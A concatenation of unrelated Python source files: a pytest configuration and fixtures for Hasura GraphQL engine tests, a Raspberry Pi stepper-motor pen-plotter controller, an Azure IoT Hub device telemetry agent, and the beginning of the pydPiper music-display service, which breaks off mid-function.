"--test-logging",
action="store_true",
default=False,
required=False,
help="Run testcases for logging"
)
parser.addoption(
"--test-jwk-url",
action="store_true",
default=False,
required=False,
help="Run testcases for JWK url behaviour"
)
parser.addoption(
"--accept",
action="store_true",
default=False,
required=False,
help="Accept any failing test cases from YAML files as correct, and write the new files out to disk."
)
parser.addoption(
"--skip-schema-teardown",
action="store_true",
default=False,
required=False,
help="""
Skip tearing down the schema/Hasura metadata after tests. This option may result in test failures if the schema
has to change between the list of tests to be run
"""
)
parser.addoption(
"--skip-schema-setup",
action="store_true",
default=False,
required=False,
help="""
Skip setting up schema/Hasura metadata before tests.
This option may result in test failures if the schema has to change between the list of tests to be run
"""
)
parser.addoption(
"--avoid-error-message-checks",
action="store_true",
default=False,
required=False,
help="""
This option when set will ignore disparity in error messages between expected and response outputs.
Used basically in version upgrade/downgrade tests where the error messages may change
"""
)
parser.addoption(
"--collect-upgrade-tests-to-file",
metavar="<path>",
required=False,
help="When used along with collect-only, it will write the list of upgrade tests into the file specified"
)
parser.addoption(
"--test-unauthorized-role",
action="store_true",
help="Run testcases for unauthorized role",
)
#By default,
#1) Set default parallelism to one
#2) Set test grouping to by filename (--dist=loadfile)
def pytest_cmdline_preparse(config, args):
worker = os.environ.get('PYTEST_XDIST_WORKER')
if 'xdist' in sys.modules and not worker: # pytest-xdist plugin
num = 1
args[:] = ["-n" + str(num),"--dist=loadfile"] + args
def pytest_configure(config):
# Pytest has removed the global pytest.config
# As a solution we are going to store it in PytestConf.config
PytestConf.config = config
if is_help_option_present(config):
return
if is_master(config):
if not config.getoption('--hge-urls'):
print("hge-urls should be specified")
if not config.getoption('--pg-urls'):
print("pg-urls should be specified")
config.hge_url_list = config.getoption('--hge-urls')
config.pg_url_list = config.getoption('--pg-urls')
config.hge_ctx_gql_server = HGECtxGQLServer(config.hge_url_list)
if config.getoption('-n', default=None):
xdist_threads = config.getoption('-n')
assert xdist_threads <= len(config.hge_url_list), "Not enough hge_urls specified, Required " + str(xdist_threads) + ", got " + str(len(config.hge_url_list))
assert xdist_threads <= len(config.pg_url_list), "Not enough pg_urls specified, Required " + str(xdist_threads) + ", got " + str(len(config.pg_url_list))
random.seed(datetime.now())
@pytest.hookimpl()
def pytest_report_collectionfinish(config, startdir, items):
"""
Collect server upgrade tests to the given file
"""
tests_file = config.getoption('--collect-upgrade-tests-to-file')
sep=''
tests=OrderedDict()
if tests_file:
def is_upgrade_test(item):
# Check if allow_server_upgrade_tests marker are present
# skip_server_upgrade_tests marker is not present
return item.get_closest_marker('allow_server_upgrade_test') \
and not item.get_closest_marker('skip_server_upgrade_test')
with open(tests_file,'w') as f:
upgrade_items = filter(is_upgrade_test, items)
for item in upgrade_items:
# This test should be run separately,
# since its schema setup has function scope
if 'per_method_tests_db_state' in item.fixturenames:
tests[item.nodeid] = True
elif any([ (x in item.fixturenames)
for x in
[ 'per_class_tests_db_state',
'per_class_db_schema_for_mutation_tests'
]
]):
# For this test, schema setup has class scope
# We can run a class of these tests at a time
tests[item.parent.nodeid] = True
# Assume tests can only be run separately
else:
tests[item.nodeid] = True
for test in tests.keys():
f.write(test + '\n')
return ''
@pytest.hookimpl(optionalhook=True)
def pytest_configure_node(node):
if is_help_option_present(node.config):
return
# Pytest has removed the global pytest.config
node.slaveinput["hge-url"] = node.config.hge_url_list.pop()
node.slaveinput["pg-url"] = node.config.pg_url_list.pop()
def pytest_unconfigure(config):
if is_help_option_present(config):
return
config.hge_ctx_gql_server.teardown()
@pytest.fixture(scope='module')
def hge_ctx(request):
config = request.config
print("create hge_ctx")
if is_master(config):
hge_url = config.hge_url_list[0]
else:
hge_url = config.slaveinput["hge-url"]
if is_master(config):
pg_url = config.pg_url_list[0]
else:
pg_url = config.slaveinput["pg-url"]
try:
hge_ctx = HGECtx(hge_url, pg_url, config)
except HGECtxError as e:
assert False, "Error from hge_cxt: " + str(e)
# TODO this breaks things (https://github.com/pytest-dev/pytest-xdist/issues/86)
# so at least make sure the real error gets printed (above)
pytest.exit(str(e))
yield hge_ctx # provide the fixture value
print("teardown hge_ctx")
hge_ctx.teardown()
time.sleep(1)
@pytest.fixture(scope='class')
def evts_webhook(request):
webhook_httpd = EvtsWebhookServer(server_address=('127.0.0.1', 5592))
web_server = threading.Thread(target=webhook_httpd.serve_forever)
web_server.start()
yield webhook_httpd
webhook_httpd.shutdown()
webhook_httpd.server_close()
web_server.join()
@pytest.fixture(scope='module')
def actions_fixture(hge_ctx):
pg_version = hge_ctx.pg_version
if pg_version < 100000: # version less than 10.0
pytest.skip('Actions are not supported on Postgres version < 10')
# Start actions' webhook server
webhook_httpd = ActionsWebhookServer(hge_ctx, server_address=('127.0.0.1', 5593))
web_server = threading.Thread(target=webhook_httpd.serve_forever)
web_server.start()
yield webhook_httpd
webhook_httpd.shutdown()
webhook_httpd.server_close()
web_server.join()
@pytest.fixture(scope='class')
def scheduled_triggers_evts_webhook(request):
webhook_httpd = EvtsWebhookServer(server_address=('127.0.0.1', 5594))
web_server = threading.Thread(target=webhook_httpd.serve_forever)
web_server.start()
yield webhook_httpd
webhook_httpd.shutdown()
webhook_httpd.server_close()
web_server.join()
@pytest.fixture(scope='class')
def gql_server(request, hge_ctx):
server = HGECtxGQLServer(request.config.getoption('--pg-urls'), 5991)
yield server
server.teardown()
@pytest.fixture(scope='class')
def ws_client(request, hge_ctx):
"""
This fixture provides an Apollo GraphQL websockets client
"""
client = GQLWsClient(hge_ctx, '/v1/graphql')
time.sleep(0.1)
yield client
client.teardown()
@pytest.fixture(scope='class')
def per_class_tests_db_state(request, hge_ctx):
"""
Set up the database state for select queries.
Has a class level scope, since select queries does not change database state
Expects either `dir()` method which provides the directory
with `setup.yaml` and `teardown.yaml` files
Or class variables `setup_files` and `teardown_files` that provides
the list of setup and teardown files respectively
"""
yield from db_state_context(request, hge_ctx)
@pytest.fixture(scope='function')
def per_method_tests_db_state(request, hge_ctx):
"""
This fixture sets up the database state for metadata operations
Has a function level scope, since metadata operations may change both the schema and data
Class method/variable requirements are similar to that of per_class_tests_db_state fixture
"""
yield from db_state_context(request, hge_ctx)
@pytest.fixture(scope='class')
def per_class_db_schema_for_mutation_tests(request, hge_ctx):
"""
This fixture sets up the database schema for mutations.
It has a class level scope, since mutations does not change schema.
Expects either `dir()` class method which provides the directory with `schema_setup.yaml` and `schema_teardown.yaml` files,
or variables `schema_setup_files` and `schema_teardown_files`
that provides the list of setup and teardown files respectively
"""
yield from db_context_with_schema_common(
request, hge_ctx, 'schema_setup_files', 'schema_setup.yaml', 'schema_teardown_files', 'schema_teardown.yaml', True
)
@pytest.fixture(scope='function')
def per_method_db_data_for_mutation_tests(request, hge_ctx, per_class_db_schema_for_mutation_tests):
"""
This fixture sets up the data for mutations.
Has a function level scope, since mutations may change data.
Having just the setup file(s), or the teardown file(s) is allowed.
Expects either `dir()` class method which provides the directory with `values_setup.yaml` and / or `values_teardown.yaml` files.
The class may provide `values_setup_files` variables which contains the list of data setup files,
Or the `values_teardown_files` variable which provides the list of data teardown files.
"""
yield from db_context_common(
request, hge_ctx, 'values_setup_files', 'values_setup.yaml',
'values_teardown_files', 'values_teardown.yaml',
False, False, False
)
def db_state_context(request, hge_ctx):
yield from db_context_with_schema_common(
request, hge_ctx, 'setup_files', 'setup.yaml', 'teardown_files',
'teardown.yaml', True
)
def db_context_with_schema_common(
request, hge_ctx, setup_files_attr, setup_default_file,
teardown_files_attr, teardown_default_file, check_file_exists=True):
(skip_setup, skip_teardown) = [
request.config.getoption('--' + x)
for x in ['skip-schema-setup', 'skip-schema-teardown']
]
yield from db_context_common(
request, hge_ctx, setup_files_attr, setup_default_file,
teardown_files_attr, teardown_default_file,
check_file_exists, skip_setup, skip_teardown
)
def db_context_common(
request, hge_ctx, setup_files_attr, setup_default_file,
teardown_files_attr, teardown_default_file,
check_file_exists=True, skip_setup=True, skip_teardown=True ):
def get_files(attr, default_file):
files = getattr(request.cls, attr, None)
if not files:
files = os.path.join(request.cls.dir(), default_file)
return files
setup = get_files(setup_files_attr, setup_default_file)
teardown = get_files(teardown_files_attr, teardown_default_file)
yield from setup_and_teardown(request, hge_ctx, setup, teardown, check_file_exists, skip_setup, skip_teardown)
def setup_and_teardown(request, hge_ctx, setup_files, teardown_files, check_file_exists=True, skip_setup=False, skip_teardown=False):
def assert_file_exists(f):
assert os.path.isfile(f), 'Could not find file ' + f
if check_file_exists:
for o in [setup_files, teardown_files]:
run_on_elem_or_list(assert_file_exists, o)
def v1q_f(f):
if os.path.isfile(f):
st_code, resp = hge_ctx.v1q_f(f)
assert st_code == 200, resp
if not skip_setup:
run_on_elem_or_list(v1q_f, setup_files)
yield
# Teardown anyway if any of the tests have failed
if request.session.testsfailed > 0 or not skip_teardown:
run_on_elem_or_list(v1q_f, teardown_files)
def run_on_elem_or_list(f, x):
if isinstance(x, str):
return [f(x)]
elif isinstance(x, list):
return [f(e) for e in x]
def is_help_option_present(config):
return any([
config.getoption(x)
for x in ['--fixtures','--help', '--collect-only']
])
def is_master(config):
"""True if the code running the given pytest.config object is running in a xdist master
node or not running xdist at all.
"""
return not hasattr(config, 'slaveinput')
|
controller.py
|
#!/usr/bin/python
from Adafruit_MotorHAT import Adafruit_MotorHAT, Adafruit_DCMotor, Adafruit_StepperMotor
import time
import atexit
import threading
import random
import argparse
import math
import msgpackrpc
import socket
import RPi.GPIO as GPIO
PWM_PIN = 22
INCREASE = 1
DECREASE = -1
def stepper_worker(stepper, numsteps, direction, style):
stepper.step(numsteps, direction, style)
def tick(stepper, direction, steps=1):
worker = threading.Thread(target=stepper_worker, args=(stepper, steps, direction, Adafruit_MotorHAT.DOUBLE))
worker.start()
while worker.isAlive():
pass
def tick_async(stepper, direction, steps=1):
worker = threading.Thread(target=stepper_worker, args=(stepper, steps, direction, Adafruit_MotorHAT.DOUBLE))
worker.start()
return worker
class PlotterInterface(object):
def __init__(self, left, right, servo):
self.left = left
self.right = right
self.total_left = 0
self.total_right = 0
self.servo = servo
def pen_down(self):
self.servo.start(20/10)
time.sleep(.25)
self.servo.ChangeDutyCycle(0)
print "pendown"
def pen_up(self):
self.servo.start(15/10)
time.sleep(.25)
self.servo.ChangeDutyCycle(0)
print "penup"
def tick_right(self, direction):
if direction == INCREASE:
tick(self.right, Adafruit_MotorHAT.FORWARD)
self.total_right += 1
elif direction == DECREASE:
tick(self.right, Adafruit_MotorHAT.BACKWARD)
self.total_right -= 1
def tick_left(self, direction):
if direction == INCREASE:
tick(self.left, Adafruit_MotorHAT.BACKWARD)
self.total_left += 1
elif direction == DECREASE:
tick(self.left, Adafruit_MotorHAT.FORWARD)
self.total_left -= 1
def tick(self, left, right):
worker1 = threading.Thread()
worker2 = threading.Thread()
# Left
if left == INCREASE:
worker1 = tick_async(self.left, Adafruit_MotorHAT.BACKWARD)
self.total_left += 1
elif left == DECREASE:
worker1 = tick_async(self.left, Adafruit_MotorHAT.FORWARD)
self.total_left -= 1
# Right
if right == INCREASE:
worker2 = tick_async(self.right, Adafruit_MotorHAT.FORWARD)
self.total_right += 1
elif right == DECREASE:
worker2 = tick_async(self.right, Adafruit_MotorHAT.BACKWARD)
self.total_right -= 1
while (worker1.isAlive()) or (worker2.isAlive()):
pass
def reset(self):
pass
print "Resetting...(%s, %s)" % (self.total_left, self.total_right)
if self.total_left > 0:
tick(self.left, Adafruit_MotorHAT.FORWARD, steps=self.total_left)
else:
tick(self.left, Adafruit_MotorHAT.BACKWARD, steps=-self.total_left)
if self.total_right > 0:
tick(self.right, Adafruit_MotorHAT.BACKWARD, steps=self.total_right)
else:
tick(self.right, Adafruit_MotorHAT.FORWARD, steps=-self.total_right)
self.total_left = self.total_right = 0
def turnOffMotors():
mh.getMotor(1).run(Adafruit_MotorHAT.RELEASE)
mh.getMotor(2).run(Adafruit_MotorHAT.RELEASE)
mh.getMotor(3).run(Adafruit_MotorHAT.RELEASE)
mh.getMotor(4).run(Adafruit_MotorHAT.RELEASE)
if __name__ == '__main__':
# create a default object, no changes to I2C address or frequency
mh = Adafruit_MotorHAT()
atexit.register(turnOffMotors)
stepper_left = mh.getStepper(200, 1) # 200 steps/rev, motor port #1
stepper_right = mh.getStepper(200, 2) # 200 steps/rev, motor port #1
stepper_left.setSpeed(200) # 30 RPM
stepper_right.setSpeed(200) # 30 RPM
st1 = threading.Thread(target=stepper_worker, args=(stepper_left, 400, Adafruit_MotorHAT.FORWARD, Adafruit_MotorHAT.DOUBLE))
st1.start()
st2 = threading.Thread(target=stepper_worker, args=(stepper_right, 400, Adafruit_MotorHAT.BACKWARD, Adafruit_MotorHAT.DOUBLE))
st2.start()
# Wait for it to center
while st1.isAlive() or st2.isAlive():
time.sleep(1)
# Configure input pins with internal pull up resistors
GPIO.setmode(GPIO.BCM)
GPIO.setup(PWM_PIN, GPIO.OUT)
# Set to 50Hz
p = GPIO.PWM(PWM_PIN, 10)
server = msgpackrpc.Server(PlotterInterface(stepper_left, stepper_right, p))
server.listen(msgpackrpc.Address("localhost", 18800))
server.start()
|
main.py
|
INTERVAL = 5
MSG_TXT = '{{"device_id": {device_id}, "critical": {level}, "pressure": {pressure}, "power_state": {power_state}}}'
ERROR_TXT = '{{"device_id": {device_id}, "critical": {level}, "ERROR_0": {ERROR_0}, "ERROR_1": {ERROR_1}, "ERROR_2": {ERROR_2}}}'
RECEIVED_MESSAGES = 0
import logging
from agent import Agent
the_device = Agent()
def main():
# Check for devices online
DEVICES_ONLINE = propeties.get_instances()
DEVICE_CONNECTION_STRING = DEVICE_KEYS[DEVICES_ONLINE]
# OBTAIN CONNECTION KEY
if DEVICE_CONNECTION_STRING != None:
CONNECTION_STRING = DEVICE_CONNECTION_STRING
the_device.set_device_id(DEVICES_ONLINE)
else:
print('Provide connection string in connection_strings.py file.')
exit
# Connect, start threads and send messages
try:
# Set up the connection to device
client = iothub_client_init(CONNECTION_STRING)
loop = asyncio.get_event_loop()
# Announce and increment devices online
print ( "IoT Hub device sending periodic messages, press Ctrl-C to exit" )
propeties.add_instance()
# Send initial report in case something has changed
twin_send_report(client)
# CREATE LISTENERS =================================================================
# Start a thread to listen to DeviceTwin Desired updates
twin_update_listener_thread = threading.Thread(target=twin_update_listener, args=(client,))
twin_update_listener_thread.daemon = True
twin_update_listener_thread.start()
# Start a thread to listen to C2D messages
message_listener_thread = threading.Thread(target=message_listener, args=(client,))
message_listener_thread.daemon = True
message_listener_thread.start()
# Start a thread to listen to Direct Methods
device_method_thread = threading.Thread(target=device_method_listener, args=(client,))
device_method_thread.daemon = True
device_method_thread.start()
# =================================================================================
# Message loop
while the_device.power_state == 1:
# Get the_device propeties
pw_st = 1
if not the_device.power_state:
pw_st = 0
press = the_device.get_pressure()
# Build the message with simulated telemetry values.
msg_txt_formatted = MSG_TXT.format(device_id = the_device.device_id,level=the_device.get_alarm_state_int(),pressure=press, power_state=pw_st)
message = Message(msg_txt_formatted)
message.custom_properties['level'] = 'storage'
# Check for errors
if the_device.get_alarm_state():
errors = the_device.get_errors_int()
error_txt_formatted = ERROR_TXT.format(device_id = the_device.device_id, level=the_device.get_alarm_state_int(), ERROR_0=int(errors[0]), ERROR_1=int(errors[1]), ERROR_2=int(errors[2]))
error_message = Message(error_txt_formatted)
error_message.custom_properties['level'] = 'critical'
# Send the message.
print( "Sending ERROR_MESSAGE: {}".format(error_message) )
client.send_message(error_message)
#loop.run_until_complete(send_event(DEVICE_CONNECTION_STRING))
dev_name = 'python_agent_{id}'.format(id=the_device.device_id)
print(dev_name)
pload = {
'ConnectionDeviceId': dev_name,
'MethodName': 'pump_switch'
}
url = 'https://csharpwatering.azurewebsites.net/api/HttpTriggerKox'
r = requests.post(url, json=pload)
# Send the message.
print( "Sending message: {}".format(message) )
client.send_message(message)
# Sleep
time.sleep(INTERVAL)
# Stop device and delete it from online
except KeyboardInterrupt:
print ( "Agent instance - STOPPED..." )
async def send_event(DEVICE_CONNECTION_STRING):
producer = EventHubProducerClient.from_connection_string(conn_str = EVENT_HUB_KEY, eventhub_name="thehub")
try:
event_data_batch = await producer.create_batch()
new_event = EventData('ALARM RAISED')
new_event.properties['device_id'] = the_device.device_id
new_event.properties['connection_string'] = DEVICE_CONNECTION_STRING
print(new_event.properties)
event_data_batch.add(new_event)
await producer.send_batch(event_data_batch)
finally:
# Close down the producer handler.
print('Should be sent.')
await producer.close()
# Device Twin Listener waiting for Desired propeties
def twin_update_listener(client):
print('Listening to Twin Updated Async')
while True:
patch = client.receive_twin_desired_properties_patch() # blocking call
print("Twin patch received:")
print(patch)
# patch is a dictionary type
the_device.set_pressure( float(patch['pressure']) )
#the_device.power_state = patch['power_state']
twin_send_report(client)
time.sleep(INTERVAL)
def message_listener(client):
global RECEIVED_MESSAGES
while True:
message = client.receive_message()
RECEIVED_MESSAGES += 1
print("\nMessage received:")
#print data and both system and application (custom) properties
for property in vars(message).items():
print (" {0}".format(property))
print( "Total calls received: {}".format(RECEIVED_MESSAGES))
print()
time.sleep(INTERVAL)
# Sends data to Device Twin as Reported
def twin_send_report(client):
print ( "Sending data as reported property..." )
# Prepare data to send
reported_patch = {"pressure": the_device.pressure, "power_state": the_device.power_state, "ERROR_0": the_device.error_0, "ERROR_1": the_device.error_1, "ERROR_2": the_device.error_2}
# Send the data
client.patch_twin_reported_properties(reported_patch)
# Announce it
print ( "Reported properties updated" )
# Listens to Direct Method calls and processes tem
def device_method_listener(device_client):
global the_device
while True:
time.sleep(INTERVAL)
method_request = device_client.receive_method_request()
print (
"\nMethod callback called with:\nmethodName = {method_name}\npayload = {payload}".format(
method_name=method_request.name,
payload=method_request.payload
)
)
# SET_PRESSURE
if method_request.name == "set_pressure":
try:
the_device.set_pressure(desired_pressure = float(method_request.payload))
twin_send_report(device_client)
except ValueError:
response_payload = {"Response": "Invalid parameter"}
response_status = 400
else:
response_payload = {"Response": "Executed direct method {}".format(method_request.name)}
response_status = 200
else:
response_payload = {"Response": "Direct method {} not defined".format(method_request.name)}
response_status = 404
# PUMP_SWITCH
if method_request.name == "pump_switch":
try:
the_device.pump_switch()
twin_send_report(device_client)
decrement_online_devices(True)
except ValueError:
response_payload = {"Response": "Invalid parameter"}
response_status = 400
else:
response_payload = {"Response": "Executed direct method {}".format(method_request.name)}
response_status = 200
else:
response_payload = {"Response": "Direct method {} not defined".format(method_request.name)}
response_status = 404
# RAISE_ERROR
if method_request.name == "raise_error":
try:
the_device.raise_error(error_nr = int((method_request.payload)))
twin_send_report(device_client)
except ValueError:
response_payload = {"Response": "Invalid parameter"}
response_status = 400
else:
response_payload = {"Response": "Executed direct method {}".format(method_request.name)}
response_status = 200
else:
response_payload = {"Response": "Direct method {} not defined".format(method_request.name)}
response_status = 404
# ALARM_RESET
if method_request.name == "alarm_reset":
try:
the_device.alarm_reset()
twin_send_report(device_client)
except ValueError:
response_payload = {"Response": "Invalid parameter"}
response_status = 400
else:
response_payload = {"Response": "Executed direct method {}".format(method_request.name)}
response_status = 200
else:
response_payload = {"Response": "Direct method {} not defined".format(method_request.name)}
response_status = 404
method_response = MethodResponse(method_request.request_id, response_status, payload=response_payload)
device_client.send_method_response(method_response)
# Creates the connection to the device
def iothub_client_init(CONNECTION_STRING):
# Create an IoT Hub client
client = IoTHubDeviceClient.create_from_connection_string(CONNECTION_STRING)
return client
# Get number of devices in the hub
def get_amount_of_devices():
# Create connection to the hub
iot_hub_manager = IoTHubRegistryManager(HUB_KEY)
# Get list of the devices in the hub
list_of_devices = iot_hub_manager.get_devices()
# Count the devices on the list
amount_of_devices = len(list_of_devices)
# Print it on the screen and return
print('Number of devices in the hub: ' + str( amount_of_devices ) )
return amount_of_devices
def decrement_online_devices(sig):
propeties.delete_instance()
print('Decrementing online devices')
time.sleep(1)
if __name__ == "__main__":
# Announcement
print('main.py - Running')
# Imports
from azure.iot.device import IoTHubDeviceClient, Message, MethodResponse
from azure.iot.hub import IoTHubRegistryManager
from azure.eventhub.aio import EventHubProducerClient
from azure.eventhub import EventData
from azure.iot.hub.models import Twin, TwinProperties, QuerySpecification, QueryResult
from azure.iot.device import IoTHubDeviceClient
import azure
import asyncio
import time
import threading
import propeties
import win32api
from connection_strings import HUB_KEY, DEVICE_KEYS, EVENT_HUB_KEY
import requests
win32api.SetConsoleCtrlHandler(decrement_online_devices, True)
main()
else:
print('main.py - Imported externally. Weird...')
|
pydPiper.py
|
#!/usr/bin/python.pydPiper
# coding: UTF-8
# pydPiper service to display music data to LCD and OLED character displays
# Written by: Ron Ritchey
from __future__ import unicode_literals
import json, threading, logging, Queue, time, sys, getopt, moment, signal, commands, os, copy, datetime, math, requests
import pages
import displays
import sources
import pydPiper_config
import pause
#try:
# import pyowm
#except ImportError:
# pass
exitapp = [ False ]
class music_controller(threading.Thread):
# Receives updates from music services
# Determines what page to displays
# Sends relevant updates to display_controller
# musicdata variables.
# Includes all from musicdata class plus environmentals
musicdata_init = {
'state':u"stop",
'musicdatasource':u"",
'actPlayer':u"",
'artist':u"",
'title':u"",
'album':u"",
'uri':u"",
'current':-1,
'elapsed':-1,
'remaining':u"",
'duration':-1,
'length':-1,
'position':u"",
'elapsed_formatted':u"",
'volume':-1,
'repeat': 0,
'single': 0,
'random': 0,
'channels':0,
'bitdepth':u"",
'bitrate':u"",
'samplerate':u"",
'type':u"",
'tracktype':u"",
'repeat_onoff': u"Off",
'single_onoff': u"Off",
'random_onoff': u"Off",
'playlist_display':u"",
'playlist_position':-1,
'playlist_count':-1,
'playlist_length':-1,
'current_tempc':0,
'current_tempf':0,
'disk_avail':0,
'disk_availp':0,
'current_time':u"",
'utc':moment.utcnow(),
'localtime':moment.utcnow().timezone(pydPiper_config.TIMEZONE),
'current_time_sec':u"",
'current_time_formatted':u"",
'time_formatted':u"",
'current_ip':u"",
'outside_conditions':'No data',
'outside_temp_min':0,
'outside_temp_max':0,
'outside_temp_formatted':'',
'system_temp_formatted':''
}
def __init__(self, servicelist, display_controller, showupdates=False):
threading.Thread.__init__(self)
self.daemon = True
self.musicqueue = Queue.Queue()
self.image = None
self.showupdates = showupdates
self.display_controller = display_controller
self.musicdata = copy.deepcopy(self.musicdata_init)
self.musicdata_prev = copy.deepcopy(self.musicdata)
self.servicelist = servicelist
self.services = { }
# Attempt to initialize services
self.initservices()
# Lock used to prevent simultaneous update of the musicdata dictionary
self.musicdata_lock = threading.Lock()
def initservices(self):
# Make sure that if rune is selected that is is the only service that is selected
if u"rune" in self.servicelist and len(self.servicelist) > 1:
logging.critical(u"Rune service can only be used alone")
raise RuntimeError(u"Rune service can only be used alone")
if u"volumio" in self.servicelist and len(self.servicelist) > 1:
logging.critical(u"Volumio service can only be used alone")
raise RuntimeError(u"Volumio service can only be used alone")
musicservice = None
for s in self.servicelist:
s = s.lower()
try:
if s == u"mpd" or s == u"moode":
musicservice = sources.musicdata_mpd.musicdata_mpd(self.musicqueue, pydPiper_config.MPD_SERVER, pydPiper_config.MPD_PORT, pydPiper_config.MPD_PASSWORD)
elif s == u"spop":
musicservice = sources.musicdata_spop.musicdata_spop(self.musicqueue, pydPiper_config.SPOP_SERVER, pydPiper_config.SPOP_PORT, pydPiper_config.SPOP_PASSWORD)
elif s == u"lms":
musicservice = sources.musicdata_lms.musicdata_lms(self.musicqueue, pydPiper_config.LMS_SERVER, pydPiper_config.LMS_PORT, pydPiper_config.LMS_USER, pydPiper_config.LMS_PASSWORD, pydPiper_config.LMS_PLAYER)
elif s == u"rune":
musicservice = sources.musicdata_rune.musicdata_rune(self.musicqueue, pydPiper_config.RUNE_SERVER, pydPiper_config.RUNE_PORT, pydPiper_config.RUNE_PASSWORD)
elif s == u"volumio":
musicservice = sources.musicdata_volumio2.musicdata_volumio2(self.musicqueue, pydPiper_config.VOLUMIO_SERVER, pydPiper_config.VOLUMIO_PORT, exitapp )
else:
logging.debug(u"Unsupported music service {0} requested".format(s))
continue
except NameError:
# Missing dependency for requested servicelist
logging.warning(u"Request for {0} failed due to missing dependencies".format(s))
pass
if musicservice != None:
self.services[s] = musicservice
if len(self.services) == 0:
logging.critical(u"No music services succeeded in initializing")
raise RuntimeError(u"No music services succeeded in initializing")
def launch_update_thread(self, func):
sv_t = threading.Thread(target=func)
sv_t.daemon = True
sv_t.start()
def run(self):
logging.debug(u"Music Controller Starting")
self.launch_update_thread(self.updatesystemvars)
self.launch_update_thread(self.updateconditions)
self.launch_update_thread(self.updateforecast)
timesongstarted = 0
# Inform the system that we are starting up
with self.musicdata_lock:
self.musicdata_prev[u'state'] = ''
self.musicdata[u'state'] = 'starting'
self.starttime = time.time()
lastupdate = 0 # Initialize variable to be used to force updates every second regardless of the receipt of a source update
while not exitapp[0]:
updates = { }
# Check if we are starting up. If yes, update pages to display any start message.
if self.starttime + pydPiper_config.STARTUP_MSG_DURATION > time.time():
time.sleep(pydPiper_config.STARTUP_MSG_DURATION)
with self.musicdata_lock:
self.musicdata['state'] = 'stop'
continue
# Attempt to get an update from the queue
try:
updates = self.musicqueue.get_nowait()
self.musicqueue.task_done()
except Queue.Empty:
pass
# Get current time
try:
utc = moment.utcnow()
localtime = moment.utcnow().timezone(pydPiper_config.TIMEZONE)
current_time_ampm = moment.utcnow().timezone(pydPiper_config.TIMEZONE).strftime(u"%p").strip().decode()
if pydPiper_config.TIME24HOUR == True:
current_time = moment.utcnow().timezone(pydPiper_config.TIMEZONE).strftime(u"%H:%M").strip().decode()
current_time_sec = moment.utcnow().timezone(pydPiper_config.TIMEZONE).strftime(u"%H:%M:%S").strip().decode()
else:
current_time = moment.utcnow().timezone(pydPiper_config.TIMEZONE).strftime(u"%-I:%M %p").strip().decode()
current_time_sec = moment.utcnow().timezone(pydPiper_config.TIMEZONE).strftime(u"%-I:%M:%S %p").strip().decode()
except ValueError:
# Don't know why but on exit, the moment code is occasionally throwing a ValueError
current_time = u"00:00"
current_time_sec = u"00:00:00"
current_time_ampm = u''
utc = None
localtime = None
with self.musicdata_lock:
# Update musicdata based upon received message
for item, value in updates.iteritems():
self.musicdata[item] = value
# Update song timing variables
if u'elapsed' in updates:
self.musicdata[u'elapsed'] = self.musicdata[u'current'] = updates[u'elapsed']
timesongstarted = time.time() - self.musicdata[u'elapsed']
if self.musicdata[u'state'] == u'play':
if u'elapsed' not in updates:
if timesongstarted > 0:
self.musicdata[u'elapsed'] = int(time.time() - timesongstarted)
else:
# We got here without timesongstarted being set which is a problem...
logging.debug(u"Trying to update current song position with an uninitialized start time")
# If the value of current has changed then update the other related timing variables
if self.musicdata[u'elapsed'] != self.musicdata_prev[u'elapsed']:
if self.musicdata[u'length'] > 0:
timepos = time.strftime("%-M:%S", time.gmtime(self.musicdata[u'elapsed'])) + "/" + time.strftime("%-M:%S", time.gmtime(self.musicdata[u'length']))
remaining = time.strftime("%-M:%S", time.gmtime(self.musicdata[u'length'] - self.musicdata[u'elapsed'] ) )
else:
timepos = time.strftime("%-M:%S", time.gmtime(self.musicdata[u'elapsed']))
remaining = timepos
self.musicdata[u'remaining'] = remaining.decode()
self.musicdata[u'elapsed_formatted'] = self.musicdata[u'position'] = timepos.decode()
# Update onoff variables (random, single, repeat)
self.musicdata[u'random_onoff'] = u"On" if self.musicdata[u'random'] else u"Off"
self.musicdata[u'single_onoff'] = u"On" if self.musicdata[u'single'] else u"Off"
self.musicdata[u'repeat_onoff'] = u"On" if self.musicdata[u'repeat'] else u"Off"
# update time variables
self.musicdata[u'utc'] = utc
self.musicdata[u'localtime'] = localtime
self.musicdata[u'time'] = current_time
self.musicdata[u'time_ampm'] = current_time_ampm
# note: 'time_formatted' is computed during page processing as it needs the value of the strftime key contained on the line being displayed
# For backwards compatibility
self.musicdata[u'current_time'] = current_time
self.musicdata[u'current_time_sec'] = current_time
# If anything has changed, update pages ### probably unnecessary to check this now that time is being updated in this section
if self.musicdata != self.musicdata_prev or lastupdate < time.time():
# Set lastupdate time to 1 second in the future
lastupdate = time.time()+1
self.musicdata[u'time_formatted'] = moment.utcnow().timezone(pydPiper_config.TIMEZONE).strftime('%H:%M').strip().decode()
# To support previous key used for this purpose
self.musicdata[u'current_time_formatted'] = self.musicdata[u'time_formatted']
# Update display controller
# The primary call to this routine is in main but this call is needed to catch variable changes before musicdata_prev is updated.
self.display_controller.next()
# Print the current contents of musicdata if showupdates is True
if self.showupdates:
# Check to see if a variable has changed (except time variables)
shouldshowupdate = False
for item, value in self.musicdata.iteritems():
try:
if item in ['utc', 'localtime', 'time', 'time_ampm', 'current_time', 'current_time_sec']:
continue
if self.musicdata_prev[item] != value:
shouldshowupdate = True
break
except KeyError:
shouldshowupdate = True
break
if shouldshowupdate:
ctime = localtime.strftime("%-I:%M:%S %p").strip()
print u"Status at time {0}".format(ctime)
with self.musicdata_lock:
for item,value in self.musicdata.iteritems():
try:
print u" [{0}]={1} {2}".format(item,repr(value), type(value))
except:
print u"err"
print u"[{0}] =".format(item)
print type(value)
print repr(value)
print u"\n"
# Update musicdata_prev
with self.musicdata_lock:
for item, value in self.musicdata.iteritems():
try:
if self.musicdata_prev[item] != value:
self.musicdata_prev[item] = value
except KeyError:
self.musicdata_prev[item] = value
# Update display data every 1/4 second
time.sleep(.25)
def checkweatherconfiguration(self):
if not pydPiper_config.WEATHER_SERVICE:
logging.debug('Weather service not enabled')
return False
if pydPiper_config.WEATHER_SERVICE not in ['wunderground', 'accuweather']:
logging.warning('{0} is not a valid weather service'.format(pydPiper_config.WEATHER_SERVICE))
return False
if not pydPiper_config.WEATHER_API:
logging.warning('Weather service requires an API key. Weather services will not be available until one is provided')
return False
if not pydPiper_config.WEATHER_LOCATION:
logging.warning('Weather service requires that a location be specified. Weather services will not be available until one is provided')
return False
return True
def checkaccuweatherreturn(self, status_code):
if status_code == 400:
logging.warning('Request had bad syntax or the parameters supplied were invalid. Request was [{0}]'.format(querystr))
elif status_code == 401:
